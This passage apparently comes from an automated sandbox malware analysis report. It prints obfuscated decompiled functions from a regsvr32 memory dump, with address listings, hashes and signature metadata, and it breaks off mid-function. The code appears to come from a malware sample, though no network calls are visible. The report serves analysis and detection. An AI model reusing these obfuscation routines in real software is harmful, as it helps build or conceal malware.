                                                                                                                0x001b8ac6
                                                                                                                0x001b8ace
                                                                                                                0x001b8ad1
                                                                                                                0x001b8ad5
                                                                                                                0x001b8add
                                                                                                                0x001b8aea
                                                                                                                0x001b8aee
                                                                                                                0x001b8b03
                                                                                                                0x001b8b10
                                                                                                                0x001b8b14
                                                                                                                0x001b8b1c
                                                                                                                0x001b8b24
                                                                                                                0x001b8b2c
                                                                                                                0x001b8b31
                                                                                                                0x001b8b36
                                                                                                                0x001b8b3e
                                                                                                                0x001b8b46
                                                                                                                0x001b8b4e
                                                                                                                0x001b8b56
                                                                                                                0x001b8b5e
                                                                                                                0x001b8b66
                                                                                                                0x001b8b6e
                                                                                                                0x001b8b76
                                                                                                                0x001b8b7e
                                                                                                                0x001b8b83
                                                                                                                0x001b8b8b
                                                                                                                0x001b8b93
                                                                                                                0x001b8ba0
                                                                                                                0x001b8ba4
                                                                                                                0x001b8bac
                                                                                                                0x001b8bb4
                                                                                                                0x001b8bbc
                                                                                                                0x001b8bc4
                                                                                                                0x001b8bcc
                                                                                                                0x001b8bd4
                                                                                                                0x001b8bdc
                                                                                                                0x001b8be4
                                                                                                                0x001b8bec
                                                                                                                0x001b8bf4
                                                                                                                0x001b8bf9
                                                                                                                0x001b8bfd
                                                                                                                0x001b8c02
                                                                                                                0x001b8c0a
                                                                                                                0x001b8c0a
                                                                                                                0x001b8c14
                                                                                                                0x001b8c46
                                                                                                                0x00000000
                                                                                                                0x001b8c46
                                                                                                                0x001b8c18
                                                                                                                0x00000000
                                                                                                                0x001b8ce4
                                                                                                                0x001b8c20
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b8c36
                                                                                                                0x001b8c3f
                                                                                                                0x001b8c42
                                                                                                                0x001b8c42
                                                                                                                0x001b8c4a
                                                                                                                0x001b8c4e
                                                                                                                0x001b8c53
                                                                                                                0x001b8c5f
                                                                                                                0x001b8c80
                                                                                                                0x001b8c86
                                                                                                                0x001b8c89
                                                                                                                0x001b8c8f
                                                                                                                0x001b8ca9
                                                                                                                0x001b8cae
                                                                                                                0x001b8cb1
                                                                                                                0x001b8cb3
                                                                                                                0x001b8cb3
                                                                                                                0x001b8cb3
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 27ba701e575935cc68741c7e6a95c782b330e1c1f759945b44aae078ec8bf49d
                                                                                                                • Instruction ID: d71aa4cc8338781cfead5bf61d114561fc1bd382b85a2e1ff40962d83941b4be
                                                                                                                • Opcode Fuzzy Hash: 27ba701e575935cc68741c7e6a95c782b330e1c1f759945b44aae078ec8bf49d
                                                                                                                • Instruction Fuzzy Hash: 739131B11083819FC358CF66C98A95BFBF1FBC5758F008A1DF19686260D7B18A49CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B604B Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B604B() {
				char _v524;
				void* _v536;
				intOrPtr _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _t157;
				signed int _t158;
				signed int _t161;
				void* _t168;
				void* _t170;
				signed int _t176;
				signed int _t177;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int* _t198;

				_t198 =  &_v588;
				_v540 = 0x6adb49;
				asm("stosd");
				_t168 = 0;
				_t193 = 0x65;
				asm("stosd");
				_t170 = 0xbb617a2;
				asm("stosd");
				_v568 = 0x35c855;
				_v568 = _v568 ^ 0xd0e5b4d9;
				_v568 = _v568 | 0x470d70a5;
				_v568 = _v568 / _t193;
				_v568 = _v568 ^ 0x02204fb4;
				_v556 = 0x408d04;
				_v556 = _v556 + 0xffffed1d;
				_t194 = 0x11;
				_v556 = _v556 * 0x56;
				_v556 = _v556 ^ 0x15a75506;
				_v560 = 0xf34dff;
				_v560 = _v560 + 0x812a;
				_v560 = _v560 ^ 0x00f32eab;
				_v544 = 0xb810da;
				_v544 = _v544 ^ 0xf90f0978;
				_v544 = _v544 << 4;
				_v544 = _v544 ^ 0x9b74499c;
				_v548 = 0xbe1d5f;
				_v548 = _v548 >> 9;
				_v548 = _v548 + 0x8259;
				_v548 = _v548 ^ 0x000ba1a8;
				_v580 = 0x1dccde;
				_v580 = _v580 >> 8;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 << 0xd;
				_v580 = _v580 ^ 0x000e3609;
				_v576 = 0xabb704;
				_v576 = _v576 | 0x8aaf3382;
				_v576 = _v576 * 0x1f;
				_v576 = _v576 | 0xe6abad98;
				_v576 = _v576 ^ 0xefe40ed9;
				_v564 = 0x5fa0c2;
				_v564 = _v564 ^ 0x6a1c19f4;
				_v564 = _v564 | 0x5d05cf99;
				_v564 = _v564 ^ 0x09706298;
				_v564 = _v564 ^ 0x763ac877;
				_v588 = 0xcb0e84;
				_v588 = _v588 << 4;
				_v588 = _v588 << 0xe;
				_v588 = _v588 + 0xfffff623;
				_v588 = _v588 ^ 0x3a0d9f99;
				_v572 = 0xbca862;
				_v572 = _v572 / _t194;
				_v572 = _v572 ^ 0x3b386107;
				_t195 = 0x2c;
				_v572 = _v572 * 0x5c;
				_v572 = _v572 ^ 0x467e887f;
				_v552 = 0xb828dc;
				_v552 = _v552 ^ 0x52fd841f;
				_v552 = _v552 << 0xd;
				_v552 = _v552 ^ 0xb59258f3;
				_v584 = 0x1cb3ea;
				_v584 = _v584 / _t195;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 + 0xa7f3;
				_v584 = _v584 ^ 0x000163a2;
				_t197 = _v560;
				_t196 = _v560;
				_t192 = _v560;
				do {
					while(_t170 != 0x5fde0b) {
						if(_t170 == 0x198d58e) {
							_t158 = E001AB9F6(_v588, _v572, _v552, _t197, _v584);
							_t198 =  &(_t198[3]);
							_t192 = _t158;
							_t170 = 0xc0ff2c9;
							continue;
						}
						if(_t170 == 0x35c3a6f) {
							_t161 = E001ACA3C();
							_t196 = _t161;
							__eflags = _t161;
							if(__eflags == 0) {
								L9:
								return _t168;
							}
							_t170 = 0x5fde0b;
							continue;
						}
						if(_t170 == 0x558fff6) {
							_t197 = E001A2263( &_v524, _v580, _v576, _v564);
							_t170 = 0x198d58e;
							continue;
						}
						if(_t170 == 0xbb617a2) {
							_t170 = 0x35c3a6f;
							continue;
						}
						if(_t170 != 0xc0ff2c9) {
							goto L18;
						}
						_v588 = 0xa9eeb7;
						_t176 = 0x17;
						_v588 = _v588 / _t176;
						_v588 = _v588 + 0xffffa90d;
						_t177 = 0x33;
						_v588 = _v588 / _t177;
						_v588 = _v588 ^ 0x2a272383;
						if(_t192 == _v588) {
							_t168 = 1;
						}
						goto L9;
					}
					_t157 = E001B7B9E(_t196, _v560, __eflags, _t170, _v544,  &_v524, _v548);
					_t198 =  &(_t198[4]);
					__eflags = _t157;
					if(__eflags == 0) {
						_t170 = 0xbfe24ca;
						goto L18;
					}
					_t170 = 0x558fff6;
					continue;
					L18:
					__eflags = _t170 - 0xbfe24ca;
				} while (__eflags != 0);
				goto L9;
			}































                                                                                                                0x001b604b
                                                                                                                0x001b6051
                                                                                                                0x001b6065
                                                                                                                0x001b6066
                                                                                                                0x001b606a
                                                                                                                0x001b606d
                                                                                                                0x001b606e
                                                                                                                0x001b6073
                                                                                                                0x001b6074
                                                                                                                0x001b607c
                                                                                                                0x001b6084
                                                                                                                0x001b6094
                                                                                                                0x001b6098
                                                                                                                0x001b60a0
                                                                                                                0x001b60a8
                                                                                                                0x001b60b5
                                                                                                                0x001b60b8
                                                                                                                0x001b60bc
                                                                                                                0x001b60c4
                                                                                                                0x001b60cc
                                                                                                                0x001b60d4
                                                                                                                0x001b60dc
                                                                                                                0x001b60e4
                                                                                                                0x001b60ec
                                                                                                                0x001b60f1
                                                                                                                0x001b60f9
                                                                                                                0x001b6101
                                                                                                                0x001b6106
                                                                                                                0x001b610e
                                                                                                                0x001b6116
                                                                                                                0x001b611e
                                                                                                                0x001b6123
                                                                                                                0x001b6128
                                                                                                                0x001b612d
                                                                                                                0x001b6135
                                                                                                                0x001b613d
                                                                                                                0x001b614a
                                                                                                                0x001b614e
                                                                                                                0x001b6156
                                                                                                                0x001b615e
                                                                                                                0x001b6166
                                                                                                                0x001b616e
                                                                                                                0x001b6176
                                                                                                                0x001b617e
                                                                                                                0x001b6186
                                                                                                                0x001b618e
                                                                                                                0x001b6193
                                                                                                                0x001b6198
                                                                                                                0x001b61a0
                                                                                                                0x001b61a8
                                                                                                                0x001b61b8
                                                                                                                0x001b61bc
                                                                                                                0x001b61c9
                                                                                                                0x001b61ca
                                                                                                                0x001b61ce
                                                                                                                0x001b61d6
                                                                                                                0x001b61de
                                                                                                                0x001b61e6
                                                                                                                0x001b61eb
                                                                                                                0x001b61f3
                                                                                                                0x001b6201
                                                                                                                0x001b6205
                                                                                                                0x001b620a
                                                                                                                0x001b6212
                                                                                                                0x001b621a
                                                                                                                0x001b621e
                                                                                                                0x001b6222
                                                                                                                0x001b6226
                                                                                                                0x001b6226
                                                                                                                0x001b6238
                                                                                                                0x001b630d
                                                                                                                0x001b6312
                                                                                                                0x001b6315
                                                                                                                0x001b6317
                                                                                                                0x00000000
                                                                                                                0x001b6317
                                                                                                                0x001b6244
                                                                                                                0x001b62e7
                                                                                                                0x001b62ec
                                                                                                                0x001b62ee
                                                                                                                0x001b62f0
                                                                                                                0x001b62a8
                                                                                                                0x001b62b1
                                                                                                                0x001b62b1
                                                                                                                0x001b62f2
                                                                                                                0x00000000
                                                                                                                0x001b62f2
                                                                                                                0x001b6250
                                                                                                                0x001b62d3
                                                                                                                0x001b62d5
                                                                                                                0x00000000
                                                                                                                0x001b62d5
                                                                                                                0x001b6258
                                                                                                                0x001b62b2
                                                                                                                0x00000000
                                                                                                                0x001b62b2
                                                                                                                0x001b6260
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b6266
                                                                                                                0x001b6276
                                                                                                                0x001b627b
                                                                                                                0x001b6281
                                                                                                                0x001b628d
                                                                                                                0x001b6290
                                                                                                                0x001b6294
                                                                                                                0x001b62a0
                                                                                                                0x001b62a4
                                                                                                                0x001b62a4
                                                                                                                0x00000000
                                                                                                                0x001b62a0
                                                                                                                0x001b6335
                                                                                                                0x001b633a
                                                                                                                0x001b633d
                                                                                                                0x001b633f
                                                                                                                0x001b634b
                                                                                                                0x00000000
                                                                                                                0x001b634b
                                                                                                                0x001b6341
                                                                                                                0x00000000
                                                                                                                0x001b6350
                                                                                                                0x001b6350
                                                                                                                0x001b6350
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a510fda98223d10257bcb803cfd692c3c2debb1c13b50d92633ddf5ea6a8b6c
                                                                                                                • Instruction ID: f6593087dd837a84deabd2f1d0aea8f4a61924ea905a2b03c14cd72d3a56753c
                                                                                                                • Opcode Fuzzy Hash: 7a510fda98223d10257bcb803cfd692c3c2debb1c13b50d92633ddf5ea6a8b6c
                                                                                                                • Instruction Fuzzy Hash: C27163721093419FD348CE25D68945FBBE1FBD8708F005A1DF69AA6260D7B88A09CF53
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B86EE Relevance: .1, Instructions: 143COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001B86EE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v564;
				intOrPtr _v576;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				void* __ecx;
				void* _t97;
				signed int _t106;
				void* _t113;
				intOrPtr _t133;
				signed int _t134;
				void* _t137;
				void* _t138;

				_push(_a16);
				_t133 = _a4;
				_push(E001A26A7);
				_push(_a8);
				_push(_t133);
				_push(__edx);
				E001AC98A(_t97);
				_v596 = 0xccb994;
				_t138 = _t137 + 0x18;
				_v596 = _v596 + 0x96b3;
				_v596 = _v596 ^ 0x00cd5045;
				_t113 = 0xe87706f;
				_v616 = 0x76da11;
				_v616 = _v616 | 0xc3c3c914;
				_v616 = _v616 + 0xffff7ad2;
				_v616 = _v616 ^ 0xc3f3a7ca;
				_v600 = 0xea1553;
				_v600 = _v600 << 3;
				_v600 = _v600 ^ 0x075971d8;
				_v608 = 0xdf4688;
				_v608 = _v608 >> 5;
				_v608 = _v608 >> 7;
				_v608 = _v608 ^ 0x0001a885;
				_v612 = 0xbba49a;
				_v612 = _v612 | 0xab8380e1;
				_v612 = _v612 << 0xe;
				_v612 = _v612 ^ 0xe9310347;
				_v620 = 0x811a56;
				_t134 = 0x12;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 << 0xb;
				_v620 = _v620 ^ 0xe56abf12;
				_v592 = 0xef57cb;
				_v592 = _v592 << 6;
				_v592 = _v592 ^ 0x3bdf2cb8;
				_v624 = 0x85c168;
				_v624 = _v624 + 0xe5b1;
				_v624 = _v624 ^ 0x0053cabc;
				_v624 = _v624 ^ 0x00dbab30;
				_v604 = 0xdf5ae6;
				_v604 = _v604 >> 5;
				_v604 = _v604 ^ 0x000073ac;
				_v628 = 0x4a78db;
				_v628 = _v628 << 7;
				_v628 = _v628 + 0x884e;
				_v628 = _v628 ^ 0x25371f16;
				_v632 = 0x2f78d5;
				_v632 = _v632 + 0x1839;
				_v632 = _v632 + 0xa37b;
				_t135 = _v604;
				_v632 = _v632 / _t134;
				_v632 = _v632 ^ 0x000a9a95;
				do {
					while(_t113 != 0x3d831a) {
						if(_t113 == 0xf23233) {
							_t106 = E001BFC9E(_v620, _t135, _v592,  &_v564, _v624);
							_t138 = _t138 + 0xc;
							L9:
							asm("sbb ecx, ecx");
							_t113 = ( ~_t106 & 0xfee5a2cb) + 0x157e04f;
							continue;
						}
						if(_t113 == 0x157e04f) {
							return E001B02D8(_t135, _v604, _v628, _v632);
						}
						if(_t113 != 0xab35f45) {
							if(_t113 == 0xbc57fe5) {
								_v564 = 0x22c;
								_t106 = E001A823E(_t135, _v608, _v612,  &_v564);
								goto L9;
							} else {
								if(_t113 != 0xe87706f) {
									goto L16;
								} else {
									_v576 = _t133;
									_t113 = 0xab35f45;
									continue;
								}
							}
						}
						_push(_t113);
						_push(_t113);
						_t106 = E001ABE5E(_v596);
						_t135 = _t106;
						if(_t106 != 0xffffffff) {
							_t113 = 0xbc57fe5;
							continue;
						}
						return _t106;
						L20:
					}
					if(E001A26A7( &_v564,  &_v588) == 0) {
						_t113 = 0x157e04f;
						goto L16;
					} else {
						_t113 = 0xf23233;
						continue;
					}
					goto L20;
					L16:
				} while (_t113 != 0x6722dea);
				return _t106;
			}

























                                                                                                                0x001b86f8
                                                                                                                0x001b86ff
                                                                                                                0x001b8706
                                                                                                                0x001b870b
                                                                                                                0x001b8712
                                                                                                                0x001b8713
                                                                                                                0x001b8715
                                                                                                                0x001b871a
                                                                                                                0x001b8722
                                                                                                                0x001b8725
                                                                                                                0x001b872f
                                                                                                                0x001b8737
                                                                                                                0x001b873c
                                                                                                                0x001b8749
                                                                                                                0x001b8756
                                                                                                                0x001b875e
                                                                                                                0x001b8766
                                                                                                                0x001b876e
                                                                                                                0x001b8773
                                                                                                                0x001b877b
                                                                                                                0x001b8783
                                                                                                                0x001b8788
                                                                                                                0x001b878d
                                                                                                                0x001b8795
                                                                                                                0x001b879d
                                                                                                                0x001b87a5
                                                                                                                0x001b87aa
                                                                                                                0x001b87b2
                                                                                                                0x001b87c1
                                                                                                                0x001b87c2
                                                                                                                0x001b87c6
                                                                                                                0x001b87cb
                                                                                                                0x001b87d3
                                                                                                                0x001b87db
                                                                                                                0x001b87e0
                                                                                                                0x001b87e8
                                                                                                                0x001b87f0
                                                                                                                0x001b87f8
                                                                                                                0x001b8800
                                                                                                                0x001b8808
                                                                                                                0x001b8810
                                                                                                                0x001b8815
                                                                                                                0x001b881d
                                                                                                                0x001b8825
                                                                                                                0x001b882a
                                                                                                                0x001b8832
                                                                                                                0x001b883a
                                                                                                                0x001b8842
                                                                                                                0x001b884a
                                                                                                                0x001b8858
                                                                                                                0x001b885c
                                                                                                                0x001b8860
                                                                                                                0x001b8868
                                                                                                                0x001b8868
                                                                                                                0x001b8876
                                                                                                                0x001b8912
                                                                                                                0x001b8917
                                                                                                                0x001b88c9
                                                                                                                0x001b88cd
                                                                                                                0x001b88d5
                                                                                                                0x00000000
                                                                                                                0x001b88d5
                                                                                                                0x001b887e
                                                                                                                0x00000000
                                                                                                                0x001b895a
                                                                                                                0x001b888a
                                                                                                                0x001b8892
                                                                                                                0x001b88af
                                                                                                                0x001b88c2
                                                                                                                0x00000000
                                                                                                                0x001b8894
                                                                                                                0x001b889a
                                                                                                                0x00000000
                                                                                                                0x001b88a0
                                                                                                                0x001b88a0
                                                                                                                0x001b88a4
                                                                                                                0x00000000
                                                                                                                0x001b88a4
                                                                                                                0x001b889a
                                                                                                                0x001b8892
                                                                                                                0x001b88e5
                                                                                                                0x001b88e6
                                                                                                                0x001b88e7
                                                                                                                0x001b88ec
                                                                                                                0x001b88f3
                                                                                                                0x001b88f5
                                                                                                                0x00000000
                                                                                                                0x001b88f5
                                                                                                                0x001b8965
                                                                                                                0x00000000
                                                                                                                0x001b8965
                                                                                                                0x001b892d
                                                                                                                0x001b8936
                                                                                                                0x00000000
                                                                                                                0x001b892f
                                                                                                                0x001b892f
                                                                                                                0x00000000
                                                                                                                0x001b892f
                                                                                                                0x00000000
                                                                                                                0x001b8938
                                                                                                                0x001b8938
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 4f93a5e54878230d43692652f527e9b756212f7c7ea296bddbd07015ad04af84
                                                                                                                • Instruction ID: 6bf4d895793e4322afac4decbb2754d617c4217bc065db69b4625da2e1bf5bef
                                                                                                                • Opcode Fuzzy Hash: 4f93a5e54878230d43692652f527e9b756212f7c7ea296bddbd07015ad04af84
                                                                                                                • Instruction Fuzzy Hash: A151897250C3009FC758DE21D88986FBBE4FBC4B58F504A1DF59AA2250DB748A49CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C1FC7 Relevance: .1, Instructions: 141COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001C1FC7() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _t140;
				intOrPtr _t141;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				intOrPtr _t153;
				void* _t164;
				signed int* _t166;

				_t166 =  &_v48;
				_v36 = 0x8b97ff;
				_v36 = _v36 * 0x59;
				_v36 = _v36 + 0xaa6c;
				_t164 = 0x9199d36;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00088996;
				_v40 = 0xff5bde;
				_v40 = _v40 ^ 0xd92fa0aa;
				_v40 = _v40 << 4;
				_v40 = _v40 | 0x2f09fff6;
				_v40 = _v40 ^ 0xbf080e99;
				_v44 = 0xd70909;
				_v44 = _v44 | 0xfb9b1292;
				_t150 = 0x75;
				_v44 = _v44 / _t150;
				_v44 = _v44 ^ 0xd39b4d7c;
				_v44 = _v44 ^ 0xd1bce07f;
				_v48 = 0x8e4fda;
				_v48 = _v48 ^ 0x3e696583;
				_v48 = _v48 ^ 0x211b6c22;
				_v48 = _v48 ^ 0xc52a23e8;
				_v48 = _v48 ^ 0xdadac422;
				_v32 = 0x7c4ada;
				_t151 = 0x19;
				_v32 = _v32 * 0x7c;
				_v32 = _v32 * 0x78;
				_v32 = _v32 >> 9;
				_v32 = _v32 ^ 0x001d18fe;
				_v8 = 0x5faf65;
				_v8 = _v8 / _t151;
				_v8 = _v8 + 0xffff8fe8;
				_v8 = _v8 ^ 0x0009af76;
				_v12 = 0xa61902;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0bb8dc11;
				_v12 = _v12 ^ 0x0bb92fa9;
				_v16 = 0xf70b1;
				_v16 = _v16 ^ 0xe87f1af0;
				_v16 = _v16 ^ 0x08a3af38;
				_v16 = _v16 ^ 0xe0d4a70f;
				_v20 = 0x67b244;
				_t152 = 0x64;
				_v20 = _v20 * 0x22;
				_v20 = _v20 * 0x3a;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x07ba9e2f;
				_v4 = 0xe6758f;
				_v4 = _v4 / _t152;
				_v4 = _v4 ^ 0x30130e30;
				_v4 = _v4 ^ 0x301f0688;
				_v24 = 0xf6df44;
				_v24 = _v24 + 0xffffe436;
				_v24 = _v24 | 0xd32bb81d;
				_v24 = _v24 ^ 0x64308b38;
				_v24 = _v24 ^ 0xb7c00501;
				_v28 = 0x186c2;
				_v28 = _v28 | 0x95c154b2;
				_v28 = _v28 + 0x54a5;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 ^ 0x00011a2c;
				_t153 =  *0x1c4c14; // 0x0
				do {
					while(_t164 != 0x4234483) {
						if(_t164 == 0x56da234) {
							_t141 = E001B0231(0, _v20, _t153, E001A4313, _t153, _t153, _v4, _v24, _v28);
							_t153 =  *0x1c4c14; // 0x0
							 *((intOrPtr*)(_t153 + 0x14)) = _t141;
						} else {
							if(_t164 != 0x9199d36) {
								goto L6;
							} else {
								_push(_t153);
								_t153 = E001A303A(_t153, 0x20);
								_t166 =  &(_t166[3]);
								 *0x1c4c14 = _t153;
								_t164 = 0x4234483;
								continue;
							}
						}
						L9:
						return 0 | _t153 != 0x00000000;
					}
					_t140 = E001B6D6B(_v32, _v8, _t153, _v12, _v16);
					_t153 =  *0x1c4c14; // 0x0
					_t166 = _t166 - 0xc + 0x18;
					_t164 = 0x56da234;
					 *((intOrPtr*)(_t153 + 0x1c)) = _t140;
					L6:
				} while (_t164 != 0x4e3b051);
				goto L9;
			}























                                                                                                                0x001c1fc7
                                                                                                                0x001c1fca
                                                                                                                0x001c1fdd
                                                                                                                0x001c1fe6
                                                                                                                0x001c1fee
                                                                                                                0x001c1ff0
                                                                                                                0x001c1ff5
                                                                                                                0x001c1ffd
                                                                                                                0x001c2005
                                                                                                                0x001c200d
                                                                                                                0x001c2012
                                                                                                                0x001c201a
                                                                                                                0x001c2022
                                                                                                                0x001c202a
                                                                                                                0x001c2038
                                                                                                                0x001c203d
                                                                                                                0x001c2043
                                                                                                                0x001c204b
                                                                                                                0x001c2053
                                                                                                                0x001c205b
                                                                                                                0x001c2063
                                                                                                                0x001c206b
                                                                                                                0x001c2073
                                                                                                                0x001c207b
                                                                                                                0x001c2088
                                                                                                                0x001c208b
                                                                                                                0x001c2094
                                                                                                                0x001c2098
                                                                                                                0x001c209d
                                                                                                                0x001c20a5
                                                                                                                0x001c20b5
                                                                                                                0x001c20b9
                                                                                                                0x001c20c1
                                                                                                                0x001c20c9
                                                                                                                0x001c20d1
                                                                                                                0x001c20d6
                                                                                                                0x001c20de
                                                                                                                0x001c20e6
                                                                                                                0x001c20ee
                                                                                                                0x001c20f6
                                                                                                                0x001c20fe
                                                                                                                0x001c2106
                                                                                                                0x001c2113
                                                                                                                0x001c2114
                                                                                                                0x001c211d
                                                                                                                0x001c2121
                                                                                                                0x001c2126
                                                                                                                0x001c212e
                                                                                                                0x001c213c
                                                                                                                0x001c2140
                                                                                                                0x001c2148
                                                                                                                0x001c2150
                                                                                                                0x001c2158
                                                                                                                0x001c2160
                                                                                                                0x001c2168
                                                                                                                0x001c2170
                                                                                                                0x001c2178
                                                                                                                0x001c2180
                                                                                                                0x001c2188
                                                                                                                0x001c2190
                                                                                                                0x001c2195
                                                                                                                0x001c21a2
                                                                                                                0x001c21ad
                                                                                                                0x001c21ad
                                                                                                                0x001c21b3
                                                                                                                0x001c222c
                                                                                                                0x001c2231
                                                                                                                0x001c223a
                                                                                                                0x001c21b5
                                                                                                                0x001c21b7
                                                                                                                0x00000000
                                                                                                                0x001c21b9
                                                                                                                0x001c21c9
                                                                                                                0x001c21d2
                                                                                                                0x001c21d4
                                                                                                                0x001c21d7
                                                                                                                0x001c21dd
                                                                                                                0x00000000
                                                                                                                0x001c21dd
                                                                                                                0x001c21b7
                                                                                                                0x001c223e
                                                                                                                0x001c224b
                                                                                                                0x001c224b
                                                                                                                0x001c21f5
                                                                                                                0x001c21fa
                                                                                                                0x001c2200
                                                                                                                0x001c2203
                                                                                                                0x001c2205
                                                                                                                0x001c2208
                                                                                                                0x001c2208
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 432b5c2f1e95a71141ceb2981ca61d5b419db6a838e1d71f849ad2df2637ab98
                                                                                                                • Instruction ID: 9117714ed822af3e7c0f52807d558d552abc2571c631e42b78d3c173a1864789
                                                                                                                • Opcode Fuzzy Hash: 432b5c2f1e95a71141ceb2981ca61d5b419db6a838e1d71f849ad2df2637ab98
                                                                                                                • Instruction Fuzzy Hash: A26163715093019FC348CF25D68A80BBFF1EBD8758F50991DF496A6260D3B4DA498F87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B7B9E Relevance: .1, Instructions: 136COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001B7B9E(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _t154;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				intOrPtr _t183;

				_push(_a16);
				_push(_a12);
				_v56 = 0x104;
				_push(_a8);
				_push(0x104);
				_push(__ecx);
				E001AC98A(0x104);
				_v72 = 0xe3f37e;
				_t183 = 0;
				_v68 = 0xa938b2;
				_v64 = 0;
				_v60 = 0;
				_v40 = 0x91ec8f;
				_v40 = _v40 | 0x9bbb7b7b;
				_v40 = _v40 ^ 0x9bbbefff;
				_v36 = 0xfe4da3;
				_t176 = 0x3f;
				_v36 = _v36 / _t176;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 ^ 0x000b3cc6;
				_v8 = 0xbe4c96;
				_v8 = _v8 | 0xa20a000d;
				_v8 = _v8 ^ 0x89f75b2f;
				_v8 = _v8 ^ 0xb104f72e;
				_v8 = _v8 ^ 0x9a4d5751;
				_v44 = 0x7127fb;
				_v44 = _v44 | 0xac3ebebd;
				_v44 = _v44 ^ 0xac7252fb;
				_v32 = 0x9ec20e;
				_v32 = _v32 ^ 0x6a603fa2;
				_t177 = 0x4c;
				_v32 = _v32 / _t177;
